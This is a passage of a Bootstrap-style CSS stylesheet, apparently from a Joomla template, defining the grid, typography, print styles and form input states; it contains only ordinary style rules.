	vertical-align: middle;
}
button,
input {
	*overflow: visible;
	line-height: normal;
}
button::-moz-focus-inner,
input::-moz-focus-inner {
	padding: 0;
	border: 0;
}
button,
html input[type="button"],
input[type="reset"],
input[type="submit"] {
	-webkit-appearance: button;
	cursor: pointer;
}
label,
select,
button,
input[type="button"],
input[type="reset"],
input[type="submit"],
input[type="radio"],
input[type="checkbox"] {
	cursor: pointer;
}
input[type="search"] {
	-webkit-box-sizing: content-box;
	-moz-box-sizing: content-box;
	box-sizing: content-box;
	-webkit-appearance: textfield;
}
input[type="search"]::-webkit-search-decoration,
input[type="search"]::-webkit-search-cancel-button {
	-webkit-appearance: none;
}
textarea {
	overflow: auto;
	vertical-align: top;
}
@media print {
	* {
		text-shadow: none !important;
		color: #000 !important;
		background: transparent !important;
		box-shadow: none !important;
	}
	a,
	a:visited {
		text-decoration: underline;
	}
	a[href]:after {
		content: " (" attr(href) ")";
	}
	abbr[title]:after {
		content: " (" attr(title) ")";
	}
	.ir a:after,
	a[href^="javascript:"]:after,
	a[href^="#"]:after {
		content: "";
	}
	pre,
	blockquote {
		border: 1px solid #999;
		page-break-inside: avoid;
	}
	thead {
		display: table-header-group;
	}
	tr,
	img {
		page-break-inside: avoid;
	}
	img {
		max-width: 100% !important;
	}
	@page {
		margin: 0.5cm;
	}
	p,
	h2,
	h3 {
		orphans: 3;
		widows: 3;
	}
	h2,
	h3 {
		page-break-after: avoid;
	}
}
.clearfix {
	*zoom: 1;
}
.clearfix:before,
.clearfix:after {
	display: table;
	content: "";
	line-height: 0;
}
.clearfix:after {
	clear: both;
}
.hide-text {
	font: 0/0 a;
	color: transparent;
	text-shadow: none;
	background-color: transparent;
	border: 0;
}
.input-block-level {
	display: block;
	width: 100%;
	min-height: 28px;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
}
body {
	margin: 0;
	font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
	font-size: 13px;
	line-height: 18px;
	color: #333;
	background-color: #fff;
}
a {
	color: #005e8d;
	text-decoration: none;
}
a:hover,
a:focus {
	color: #002b41;
	text-decoration: underline;
}
.img-rounded {
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
}
.img-polaroid {
	padding: 4px;
	background-color: #fff;
	border: 1px solid #ccc;
	border: 1px solid rgba(0,0,0,0.2);
	-webkit-box-shadow: 0 1px 3px rgba(0,0,0,0.1);
	-moz-box-shadow: 0 1px 3px rgba(0,0,0,0.1);
	box-shadow: 0 1px 3px rgba(0,0,0,0.1);
}
.img-circle {
	-webkit-border-radius: 500px;
	-moz-border-radius: 500px;
	border-radius: 500px;
}
.row {
	margin-left: -20px;
	*zoom: 1;
}
.row:before,
.row:after {
	display: table;
	content: "";
	line-height: 0;
}
.row:after {
	clear: both;
}
[class*="span"] {
	float: left;
	min-height: 1px;
	margin-left: 20px;
}
.container,
.navbar-static-top .container,
.navbar-fixed-top .container,
.navbar-fixed-bottom .container {
	width: 940px;
}
.span12 {
	width: 940px;
}
.span11 {
	width: 860px;
}
.span10 {
	width: 780px;
}
.span9 {
	width: 700px;
}
.span8 {
	width: 620px;
}
.span7 {
	width: 540px;
}
.span6 {
	width: 460px;
}
.span5 {
	width: 380px;
}
.span4 {
	width: 300px;
}
.span3 {
	width: 220px;
}
.span2 {
	width: 140px;
}
.span1 {
	width: 60px;
}
.offset12 {
	margin-left: 980px;
}
.offset11 {
	margin-left: 900px;
}
.offset10 {
	margin-left: 820px;
}
.offset9 {
	margin-left: 740px;
}
.offset8 {
	margin-left: 660px;
}
.offset7 {
	margin-left: 580px;
}
.offset6 {
	margin-left: 500px;
}
.offset5 {
	margin-left: 420px;
}
.offset4 {
	margin-left: 340px;
}
.offset3 {
	margin-left: 260px;
}
.offset2 {
	margin-left: 180px;
}
.offset1 {
	margin-left: 100px;
}
.row-fluid {
	width: 100%;
	*zoom: 1;
}
.row-fluid:before,
.row-fluid:after {
	display: table;
	content: "";
	line-height: 0;
}
.row-fluid:after {
	clear: both;
}
.row-fluid [class*="span"] {
	display: block;
	width: 100%;
	min-height: 28px;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
	float: left;
	margin-left: 2.127659574%;
	*margin-left: 2.0744680846383%;
}
.row-fluid [class*="span"]:first-child {
	margin-left: 0;
}
.row-fluid .controls-row [class*="span"] + [class*="span"] {
	margin-left: 2.127659574%;
}
.row-fluid .span12 {
	width: 99.99999999%;
	*width: 99.946808500638%;
}
.row-fluid .span11 {
	width: 91.489361693%;
	*width: 91.436170203638%;
}
.row-fluid .span10 {
	width: 82.978723396%;
	*width: 82.925531906638%;
}
.row-fluid .span9 {
	width: 74.468085099%;
	*width: 74.414893609638%;
}
.row-fluid .span8 {
	width: 65.957446802%;
	*width: 65.904255312638%;
}
.row-fluid .span7 {
	width: 57.446808505%;
	*width: 57.393617015638%;
}
.row-fluid .span6 {
	width: 48.936170208%;
	*width: 48.882978718638%;
}
.row-fluid .span5 {
	width: 40.425531911%;
	*width: 40.372340421638%;
}
.row-fluid .span4 {
	width: 31.914893614%;
	*width: 31.861702124638%;
}
.row-fluid .span3 {
	width: 23.404255317%;
	*width: 23.351063827638%;
}
.row-fluid .span2 {
	width: 14.89361702%;
	*width: 14.840425530638%;
}
.row-fluid .span1 {
	width: 6.382978723%;
	*width: 6.3297872336383%;
}
.row-fluid .offset12 {
	margin-left: 104.255319138%;
	*margin-left: 104.14893615928%;
}
.row-fluid .offset12:first-child {
	margin-left: 102.127659564%;
	*margin-left: 102.02127658528%;
}
.row-fluid .offset11 {
	margin-left: 95.744680841%;
	*margin-left: 95.638297862277%;
}
.row-fluid .offset11:first-child {
	margin-left: 93.617021267%;
	*margin-left: 93.510638288277%;
}
.row-fluid .offset10 {
	margin-left: 87.234042544%;
	*margin-left: 87.127659565277%;
}
.row-fluid .offset10:first-child {
	margin-left: 85.10638297%;
	*margin-left: 84.999999991277%;
}
.row-fluid .offset9 {
	margin-left: 78.723404247%;
	*margin-left: 78.617021268277%;
}
.row-fluid .offset9:first-child {
	margin-left: 76.595744673%;
	*margin-left: 76.489361694277%;
}
.row-fluid .offset8 {
	margin-left: 70.21276595%;
	*margin-left: 70.106382971277%;
}
.row-fluid .offset8:first-child {
	margin-left: 68.085106376%;
	*margin-left: 67.978723397277%;
}
.row-fluid .offset7 {
	margin-left: 61.702127653%;
	*margin-left: 61.595744674277%;
}
.row-fluid .offset7:first-child {
	margin-left: 59.574468079%;
	*margin-left: 59.468085100277%;
}
.row-fluid .offset6 {
	margin-left: 53.191489356%;
	*margin-left: 53.085106377277%;
}
.row-fluid .offset6:first-child {
	margin-left: 51.063829782%;
	*margin-left: 50.957446803277%;
}
.row-fluid .offset5 {
	margin-left: 44.680851059%;
	*margin-left: 44.574468080277%;
}
.row-fluid .offset5:first-child {
	margin-left: 42.553191485%;
	*margin-left: 42.446808506277%;
}
.row-fluid .offset4 {
	margin-left: 36.170212762%;
	*margin-left: 36.063829783277%;
}
.row-fluid .offset4:first-child {
	margin-left: 34.042553188%;
	*margin-left: 33.936170209277%;
}
.row-fluid .offset3 {
	margin-left: 27.659574465%;
	*margin-left: 27.553191486277%;
}
.row-fluid .offset3:first-child {
	margin-left: 25.531914891%;
	*margin-left: 25.425531912277%;
}
.row-fluid .offset2 {
	margin-left: 19.148936168%;
	*margin-left: 19.042553189277%;
}
.row-fluid .offset2:first-child {
	margin-left: 17.021276594%;
	*margin-left: 16.914893615277%;
}
.row-fluid .offset1 {
	margin-left: 10.638297871%;
	*margin-left: 10.531914892277%;
}
.row-fluid .offset1:first-child {
	margin-left: 8.510638297%;
	*margin-left: 8.4042553182766%;
}
[class*="span"].hide,
.row-fluid [class*="span"].hide {
	display: none;
}
[class*="span"].pull-right,
.row-fluid [class*="span"].pull-right {
	float: right;
}
.container {
	margin-right: auto;
	margin-left: auto;
	*zoom: 1;
}
.container:before,
.container:after {
	display: table;
	content: "";
	line-height: 0;
}
.container:after {
	clear: both;
}
.container-fluid {
	padding-right: 20px;
	padding-left: 20px;
	*zoom: 1;
}
.container-fluid:before,
.container-fluid:after {
	display: table;
	content: "";
	line-height: 0;
}
.container-fluid:after {
	clear: both;
}
p {
	margin: 0 0 9px;
}
.lead {
	margin-bottom: 18px;
	font-size: 19.5px;
	font-weight: 200;
	line-height: 27px;
}
small {
	font-size: 85%;
}
strong {
	font-weight: bold;
}
em {
	font-style: italic;
}
cite {
	font-style: normal;
}
.muted {
	color: #999;
}
a.muted:hover,
a.muted:focus {
	color: #808080;
}
.text-warning {
	color: #c09853;
}
a.text-warning:hover,
a.text-warning:focus {
	color: #a47e3c;
}
.text-error {
	color: #b94a48;
}
a.text-error:hover,
a.text-error:focus {
	color: #953b39;
}
.text-info {
	color: #3a87ad;
}
a.text-info:hover,
a.text-info:focus {
	color: #2d6987;
}
.text-success {
	color: #468847;
}
a.text-success:hover,
a.text-success:focus {
	color: #356635;
}
.text-left {
	text-align: left;
}
.text-right {
	text-align: right;
}
.text-center {
	text-align: center;
}
h1,
h2,
h3,
h4,
h5,
h6 {
	margin: 9px 0;
	font-family: inherit;
	font-weight: bold;
	line-height: 18px;
	color: inherit;
	text-rendering: optimizelegibility;
}
h1 small,
h2 small,
h3 small,
h4 small,
h5 small,
h6 small {
	font-weight: normal;
	line-height: 1;
	color: #999;
}
h1,
h2,
h3 {
	line-height: 36px;
}
h1 {
	font-size: 35.75px;
}
h2 {
	font-size: 29.25px;
}
h3 {
	font-size: 22.75px;
}
h4 {
	font-size: 16.25px;
}
h5 {
	font-size: 13px;
}
h6 {
	font-size: 11.05px;
}
h1 small {
	font-size: 22.75px;
}
h2 small {
	font-size: 16.25px;
}
h3 small {
	font-size: 13px;
}
h4 small {
	font-size: 13px;
}
.page-header {
	padding-bottom: 8px;
	margin: 18px 0 27px;
	border-bottom: 1px solid #eee;
}
ul,
ol {
	padding: 0;
	margin: 0 0 9px 25px;
}
ul ul,
ul ol,
ol ol,
ol ul {
	margin-bottom: 0;
}
li {
	line-height: 18px;
}
ul.unstyled,
ol.unstyled {
	margin-left: 0;
	list-style: none;
}
ul.inline,
ol.inline {
	margin-left: 0;
	list-style: none;
}
ul.inline > li,
ol.inline > li {
	display: inline-block;
	*display: inline;
	*zoom: 1;
	padding-left: 5px;
	padding-right: 5px;
}
dl {
	margin-bottom: 18px;
}
dt,
dd {
	line-height: 18px;
}
dt {
	font-weight: bold;
}
dd {
	margin-left: 9px;
}
.dl-horizontal {
	*zoom: 1;
}
.dl-horizontal:before,
.dl-horizontal:after {
	display: table;
	content: "";
	line-height: 0;
}
.dl-horizontal:after {
	clear: both;
}
.dl-horizontal dt {
	float: left;
	width: 160px;
	clear: left;
	text-align: right;
	overflow: hidden;
	text-overflow: ellipsis;
	white-space: nowrap;
}
.dl-horizontal dd {
	margin-left: 180px;
}
hr {
	margin: 18px 0;
	border: 0;
	border-top: 1px solid #eee;
	border-bottom: 1px solid #fff;
}
abbr[title],
abbr[data-original-title] {
	cursor: help;
	border-bottom: 1px dotted #999;
}
abbr.initialism {
	font-size: 90%;
	text-transform: uppercase;
}
blockquote {
	padding: 0 0 0 15px;
	margin: 0 0 18px;
	border-left: 5px solid #eee;
}
blockquote p {
	margin-bottom: 0;
	font-size: 16.25px;
	font-weight: 300;
	line-height: 1.25;
}
blockquote small {
	display: block;
	line-height: 18px;
	color: #999;
}
blockquote small:before {
	content: '\2014 \00A0';
}
blockquote.pull-right {
	float: right;
	padding-right: 15px;
	padding-left: 0;
	border-right: 5px solid #eee;
	border-left: 0;
}
blockquote.pull-right p,
blockquote.pull-right small {
	text-align: right;
}
blockquote.pull-right small:before {
	content: '';
}
blockquote.pull-right small:after {
	content: '\00A0 \2014';
}
q:before,
q:after,
blockquote:before,
blockquote:after {
	content: "";
}
address {
	display: block;
	margin-bottom: 18px;
	font-style: normal;
	line-height: 18px;
}
code,
pre {
	padding: 0 3px 2px;
	font-family: Monaco, Menlo, Consolas, "Courier New", monospace;
	font-size: 11px;
	color: #333;
	-webkit-border-radius: 3px;
	-moz-border-radius: 3px;
	border-radius: 3px;
}
code {
	padding: 2px 4px;
	color: #d14;
	background-color: #f7f7f9;
	border: 1px solid #e1e1e8;
	white-space: nowrap;
}
pre {
	display: block;
	padding: 8.5px;
	margin: 0 0 9px;
	font-size: 12px;
	line-height: 18px;
	word-break: break-all;
	word-wrap: break-word;
	white-space: pre;
	white-space: pre-wrap;
	background-color: #f5f5f5;
	border: 1px solid #ccc;
	border: 1px solid rgba(0,0,0,0.15);
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
pre.prettyprint {
	margin-bottom: 18px;
}
pre code {
	padding: 0;
	color: inherit;
	white-space: pre;
	white-space: pre-wrap;
	background-color: transparent;
	border: 0;
}
.pre-scrollable {
	max-height: 340px;
	overflow-y: scroll;
}
form {
	margin: 0 0 18px;
}
fieldset {
	padding: 0;
	margin: 0;
	border: 0;
}
legend {
	display: block;
	width: 100%;
	padding: 0;
	margin-bottom: 18px;
	font-size: 19.5px;
	line-height: 36px;
	color: #333;
	border: 0;
	border-bottom: 1px solid #e5e5e5;
}
legend small {
	font-size: 13.5px;
	color: #999;
}
label,
input,
button,
select,
textarea {
	font-size: 13px;
	font-weight: normal;
	line-height: 18px;
}
input,
button,
select,
textarea {
	font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
}
label {
	display: block;
	margin-bottom: 5px;
}
select,
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.uneditable-input {
	display: inline-block;
	height: 18px;
	padding: 4px 6px;
	margin-bottom: 9px;
	font-size: 13px;
	line-height: 18px;
	color: #555;
	-webkit-border-radius: 3px;
	-moz-border-radius: 3px;
	border-radius: 3px;
	vertical-align: middle;
}
input,
textarea,
.uneditable-input {
	width: 206px;
}
textarea {
	height: auto;
}
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.uneditable-input {
	background-color: #fff;
	border: 1px solid #ccc;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	-webkit-transition: border linear .2s, box-shadow linear .2s;
	-moz-transition: border linear .2s, box-shadow linear .2s;
	-o-transition: border linear .2s, box-shadow linear .2s;
	transition: border linear .2s, box-shadow linear .2s;
}
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.uneditable-input:focus {
	border-color: rgba(82,168,236,0.8);
	outline: 0;
	outline: thin dotted \9;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(82,168,236,.6);
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(82,168,236,.6);
	box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(82,168,236,.6);
}
input[type="radio"],
input[type="checkbox"] {
	margin: 4px 0 0;
	*margin-top: 0;
	margin-top: 1px \9;
	line-height: normal;
}
input[type="file"],
input[type="image"],
input[type="submit"],
input[type="reset"],
input[type="button"],
input[type="radio"],
input[type="checkbox"] {
	width: auto;
}
select,
input[type="file"] {
	height: 28px;
	*margin-top: 4px;
	line-height: 28px;
}
select {
	width: 220px;
	border: 1px solid #ccc;
	background-color: #fff;
}
select[multiple],
select[size] {
	height: auto;
}
select:focus,
input[type="file"]:focus,
input[type="radio"]:focus,
input[type="checkbox"]:focus {
	outline: thin dotted #333;
	outline: 5px auto -webkit-focus-ring-color;
	outline-offset: -2px;
}
.uneditable-input,
.uneditable-textarea {
	color: #999;
	background-color: #fcfcfc;
	border-color: #ccc;
	-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.025);
	-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.025);
	box-shadow: inset 0 1px 2px rgba(0,0,0,0.025);
	cursor: not-allowed;
}
.uneditable-input {
	overflow: hidden;
	white-space: nowrap;
}
.uneditable-textarea {
	width: auto;
	height: auto;
}
input:-moz-placeholder,
textarea:-moz-placeholder {
	color: #999;
}
input:-ms-input-placeholder,
textarea:-ms-input-placeholder {
	color: #999;
}
input::-webkit-input-placeholder,
textarea::-webkit-input-placeholder {
	color: #999;
}
.radio,
.checkbox {
	min-height: 18px;
	padding-left: 20px;
}
.radio input[type="radio"],
.checkbox input[type="checkbox"] {
	float: left;
	margin-left: -20px;
}
.controls > .radio:first-child,
.controls > .checkbox:first-child {
	padding-top: 5px;
}
.radio.inline,
.checkbox.inline {
	display: inline-block;
	padding-top: 5px;
	margin-bottom: 0;
	vertical-align: middle;
}
.radio.inline + .radio.inline,
.checkbox.inline + .checkbox.inline {
	margin-left: 10px;
}
.input-mini {
	width: 60px;
}
.input-small {
	width: 90px;
}
.input-medium {
	width: 150px;
}
.input-large {
	width: 210px;
}
.input-xlarge {
	width: 270px;
}
.input-xxlarge {
	width: 530px;
}
input[class*="span"],
select[class*="span"],
textarea[class*="span"],
.uneditable-input[class*="span"],
.row-fluid input[class*="span"],
.row-fluid select[class*="span"],
.row-fluid textarea[class*="span"],
.row-fluid .uneditable-input[class*="span"] {
	float: none;
	margin-left: 0;
}
.input-append input[class*="span"],
.input-append .uneditable-input[class*="span"],
.input-prepend input[class*="span"],
.input-prepend .uneditable-input[class*="span"],
.row-fluid input[class*="span"],
.row-fluid select[class*="span"],
.row-fluid textarea[class*="span"],
.row-fluid .uneditable-input[class*="span"],
.row-fluid .input-prepend [class*="span"],
.row-fluid .input-append [class*="span"] {
	display: inline-block;
}
input,
textarea,
.uneditable-input {
	margin-left: 0;
}
.controls-row [class*="span"] + [class*="span"] {
	margin-left: 20px;
}
input.span12,
textarea.span12,
.uneditable-input.span12 {
	width: 926px;
}
input.span11,
textarea.span11,
.uneditable-input.span11 {
	width: 846px;
}
input.span10,
textarea.span10,
.uneditable-input.span10 {
	width: 766px;
}
input.span9,
textarea.span9,
.uneditable-input.span9 {
	width: 686px;
}
input.span8,
textarea.span8,
.uneditable-input.span8 {
	width: 606px;
}
input.span7,
textarea.span7,
.uneditable-input.span7 {
	width: 526px;
}
input.span6,
textarea.span6,
.uneditable-input.span6 {
	width: 446px;
}
input.span5,
textarea.span5,
.uneditable-input.span5 {
	width: 366px;
}
input.span4,
textarea.span4,
.uneditable-input.span4 {
	width: 286px;
}
input.span3,
textarea.span3,
.uneditable-input.span3 {
	width: 206px;
}
input.span2,
textarea.span2,
.uneditable-input.span2 {
	width: 126px;
}
input.span1,
textarea.span1,
.uneditable-input.span1 {
	width: 46px;
}
.controls-row {
	*zoom: 1;
}
.controls-row:before,
.controls-row:after {
	display: table;
	content: "";
	line-height: 0;
}
.controls-row:after {
	clear: both;
}
.controls-row [class*="span"],
.row-fluid .controls-row [class*="span"] {
	float: left;
}
.controls-row .checkbox[class*="span"],
.controls-row .radio[class*="span"] {
	padding-top: 5px;
}
input[disabled],
select[disabled],
textarea[disabled],
input[readonly],
select[readonly],
textarea[readonly] {
	cursor: not-allowed;
	background-color: #eee;
}
input[type="radio"][disabled],
input[type="checkbox"][disabled],
input[type="radio"][readonly],
input[type="checkbox"][readonly] {
	background-color: transparent;
}
.control-group.warning .control-label,
.control-group.warning .help-block,
.control-group.warning .help-inline {
	color: #c09853;
}
.control-group.warning .checkbox,
.control-group.warning .radio,
.control-group.warning input,
.control-group.warning select,
.control-group.warning textarea {
	color: #c09853;
}
.control-group.warning input,
.control-group.warning select,
.control-group.warning textarea {
	border-color: #c09853;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
}
.control-group.warning input:focus,
.control-group.warning select:focus,
.control-group.warning textarea:focus {
	border-color: #a47e3c;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #dbc59e;
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #dbc59e;
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #dbc59e;
}
.control-group.warning .input-prepend .add-on,
.control-group.warning .input-append .add-on {
	color: #c09853;
	background-color: #fcf8e3;
	border-color: #c09853;
}
.control-group.error .control-label,
.control-group.error .help-block,
.control-group.error .help-inline {
	color: #b94a48;
}
.control-group.error .checkbox,
.control-group.error .radio,
.control-group.error input,
.control-group.error select,
.control-group.error textarea {
	color: #b94a48;
}
.control-group.error input,
.control-group.error select,
.control-group.error textarea {
	border-color: #b94a48;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
}
.control-group.error input:focus,
.control-group.error select:focus,
.control-group.error textarea:focus {
	border-color: #953b39;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #d59392;
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #d59392;
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #d59392;
}
.control-group.error .input-prepend .add-on,
.control-group.error .input-append .add-on {
	color: #b94a48;
	background-color: #f2dede;
	border-color: #b94a48;
}
.control-group.success .control-label,
.control-group.success .help-block,
.control-group.success .help-inline {
	color: #468847;
}
.control-group.success .checkbox,
.control-group.success .radio,
.control-group.success input,
.control-group.success select,
.control-group.success textarea {
	color: #468847;
}
.control-group.success input,
.control-group.success select,
.control-group.success textarea {
	border-color: #468847;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
}
.control-group.success input:focus,
.control-group.success select:focus,
.control-group.success textarea:focus {
	border-color: #356635;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7aba7b;
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7aba7b;
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7aba7b;
}
.control-group.success .input-prepend .add-on,
.control-group.success .input-append .add-on {
	color: #468847;
	background-color: #dff0d8;
	border-color: #468847;
}
.control-group.info .control-label,
.control-group.info .help-block,
.control-group.info .help-inline {
	color: #3a87ad;
}
.control-group.info .checkbox,
.control-group.info .radio,
.control-group.info input,
.control-group.info select,
.control-group.info textarea {
	color: #3a87ad;
}
.control-group.info input,
.control-group.info select,
.control-group.info textarea {
	border-color: #3a87ad;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
}
.control-group.info input:focus,
.control-group.info select:focus,
.control-group.info textarea:focus {
	border-color: #2d6987;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7ab5d3;
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7ab5d3;
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.075), 0 0 6px #7ab5d3;
}
.control-group.info .input-prepend .add-on,
.control-group.info .input-append .add-on {
	color: #3a87ad;
	background-color: #d9edf7;
	border-color: #3a87ad;
}
input:focus:invalid,
textarea:focus:invalid,
select:focus:invalid {
	color: #b94a48;
	border-color: #ee5f5b;
}
input:focus:invalid:focus,
textarea:focus:invalid:focus,
select:focus:invalid:focus {
	border-color: #e9322d;
	-webkit-box-shadow: 0 0 6px #f8b9b7;
	-moz-box-shadow: 0 0 6px #f8b9b7;
	box-shadow: 0 0 6px #f8b9b7;
}
.form-actions {
	padding: 17px 20px 18px;
	margin-top: 18px;
	margin-bottom: 18px;
	background-color: #f5f5f5;
	border-top: 1px solid #e5e5e5;
	*zoom: 1;
}
.form-actions:before,
.form-actions:after {
	display: table;
	content: "";
	line-height: 0;
}
.form-actions:after {
	clear: both;
}
.help-block,
.help-inline {
	color: #595959;
}
.help-block {
	display: block;
	margin-bottom: 9px;
}
.help-inline {
	display: inline-block;
	*display: inline;
	*zoom: 1;
	vertical-align: middle;
	padding-left: 5px;
}
.input-append,
.input-prepend {
	display: inline-block;
	margin-bottom: 9px;
	vertical-align: middle;
	font-size: 0;
	white-space: nowrap;
}
.input-append input,
.input-append select,
.input-append .uneditable-input,
.input-append .dropdown-menu,
.input-append .popover,
.input-prepend input,
.input-prepend select,
.input-prepend .uneditable-input,
.input-prepend .dropdown-menu,
.input-prepend .popover {
	font-size: 13px;
}
.input-append input,
.input-append select,
.input-append .uneditable-input,
.input-prepend input,
.input-prepend select,
.input-prepend .uneditable-input {
	position: relative;
	margin-bottom: 0;
	*margin-left: 0;
	vertical-align: top;
	-webkit-border-radius: 0 3px 3px 0;
	-moz-border-radius: 0 3px 3px 0;
	border-radius: 0 3px 3px 0;
}
.input-append input:focus,
.input-append select:focus,
.input-append .uneditable-input:focus,
.input-prepend input:focus,
.input-prepend select:focus,
.input-prepend .uneditable-input:focus {
	z-index: 2;
}
.input-append .add-on,
.input-prepend .add-on {
	display: inline-block;
	width: auto;
	height: 18px;
	min-width: 16px;
	padding: 4px 5px;
	font-size: 13px;
	font-weight: normal;
	line-height: 18px;
	text-align: center;
	text-shadow: 0 1px 0 #fff;
	background-color: #eee;
	border: 1px solid #ccc;
}
.input-append .add-on,
.input-append .btn,
.input-append .btn-group > .dropdown-toggle,
.input-prepend .add-on,
.input-prepend .btn,
.input-prepend .btn-group > .dropdown-toggle {
	vertical-align: top;
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.input-prepend .add-on,
.input-prepend .btn {
	margin-right: -1px;
}
.input-prepend .add-on:first-child,
.input-prepend .btn:first-child {
	-webkit-border-radius: 3px 0 0 3px;
	-moz-border-radius: 3px 0 0 3px;
	border-radius: 3px 0 0 3px;
}
.input-append input,
.input-append select,
.input-append .uneditable-input {
	-webkit-border-radius: 3px 0 0 3px;
	-moz-border-radius: 3px 0 0 3px;
	border-radius: 3px 0 0 3px;
}
.input-append input + .btn-group .btn:last-child,
.input-append select + .btn-group .btn:last-child,
.input-append .uneditable-input + .btn-group .btn:last-child {
	-webkit-border-radius: 0 3px 3px 0;
	-moz-border-radius: 0 3px 3px 0;
	border-radius: 0 3px 3px 0;
}
.input-append .add-on,
.input-append .btn,
.input-append .btn-group {
	margin-left: -1px;
}
.input-append .add-on:last-child,
.input-append .btn:last-child,
.input-append .btn-group:last-child > .dropdown-toggle {
	-webkit-border-radius: 0 3px 3px 0;
	-moz-border-radius: 0 3px 3px 0;
	border-radius: 0 3px 3px 0;
}
.input-prepend.input-append input,
.input-prepend.input-append select,
.input-prepend.input-append .uneditable-input {
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.input-prepend.input-append input + .btn-group .btn,
.input-prepend.input-append select + .btn-group .btn,
.input-prepend.input-append .uneditable-input + .btn-group .btn {
	-webkit-border-radius: 0 3px 3px 0;
	-moz-border-radius: 0 3px 3px 0;
	border-radius: 0 3px 3px 0;
}
.input-prepend.input-append .add-on:first-child,
.input-prepend.input-append .btn:first-child {
	margin-right: -1px;
	-webkit-border-radius: 3px 0 0 3px;
	-moz-border-radius: 3px 0 0 3px;
	border-radius: 3px 0 0 3px;
}
.input-prepend.input-append .add-on:last-child,
.input-prepend.input-append .btn:last-child {
	margin-left: -1px;
	-webkit-border-radius: 0 3px 3px 0;
	-moz-border-radius: 0 3px 3px 0;
	border-radius: 0 3px 3px 0;
}
.input-prepend.input-append .btn-group:first-child {
	margin-left: 0;
}
input.search-query {
	padding-right: 14px;
	padding-right: 4px \9;
	padding-left: 14px;
	padding-left: 4px \9;
	margin-bottom: 0;
	-webkit-border-radius: 15px;
	-moz-border-radius: 15px;
	border-radius: 15px;
}
.form-search .input-append .search-query,
.form-search .input-prepend .search-query {
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.form-search .input-append .search-query {
	-webkit-border-radius: 14px 0 0 14px;
	-moz-border-radius: 14px 0 0 14px;
	border-radius: 14px 0 0 14px;
}
.form-search .input-append .btn {
	-webkit-border-radius: 0 14px 14px 0;
	-moz-border-radius: 0 14px 14px 0;
	border-radius: 0 14px 14px 0;
}
.form-search .input-prepend .search-query {
	-webkit-border-radius: 0 14px 14px 0;
	-moz-border-radius: 0 14px 14px 0;
	border-radius: 0 14px 14px 0;
}
.form-search .input-prepend .btn {
	-webkit-border-radius: 14px 0 0 14px;
	-moz-border-radius: 14px 0 0 14px;
	border-radius: 14px 0 0 14px;
}
.js-stools-field-filter .input-prepend,
.js-stools-field-filter .input-append {
	margin-bottom: 0;
}
.form-search input,
.form-search textarea,
.form-search select,
.form-search .help-inline,
.form-search .uneditable-input,
.form-search .input-prepend,
.form-search .input-append,
.form-inline input,
.form-inline textarea,
.form-inline select,
.form-inline .help-inline,
